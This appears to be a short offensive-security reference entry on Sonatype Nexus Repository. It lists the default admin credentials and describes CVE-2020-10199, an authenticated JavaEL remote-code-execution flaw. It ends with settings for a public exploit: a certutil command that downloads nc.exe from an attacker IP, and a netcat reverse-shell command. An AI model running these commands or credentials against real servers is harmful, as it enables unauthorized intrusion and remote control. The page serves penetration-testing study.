Sonatype Nexus

Sonatype Nexus Repository is a repository manager that stores, organizes, and distributes software components, binaries, and build artifacts. It supports multiple package formats such as Maven, npm, NuGet, and Docker, allowing development teams to centralize dependencies and manage versioning efficiently. In offensive operations, Nexus can be a target for artifact manipulation, credential discovery, or lateral movement, as improperly secured repositories may expose sensitive binaries or access tokens.

Default Credentials

The default credentials on versions <3.17 are admin:admin123. On version ≥3.17 there is no default password as this is defined in the /nexus-data/admin.password during installation.

Authenticated RCE

Sonatype Nexus Repository versions before 3.21.2 are affected by a Java Expression Language (JavaEL) injection vulnerability (CVE-2020-10199). This flaw allows an attacker to inject and execute arbitrary Java code on the server by manipulating inputs processed through JavaEL expressions. A working PoC is available:

$ searchsploit nexus 3.21
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.py

The below PoC allows to achieve RCE by mofidying the below variables:

URL='http://192.168.156.61:8081'
#CMD='certutil.exe -urlcache -split -f http://192.168.45.241/nc.exe nc.exe'
CMD='nc.exe -e cmd.exe 192.168.45.241 443'
USERNAME='nexus'
PASSWORD='nexus'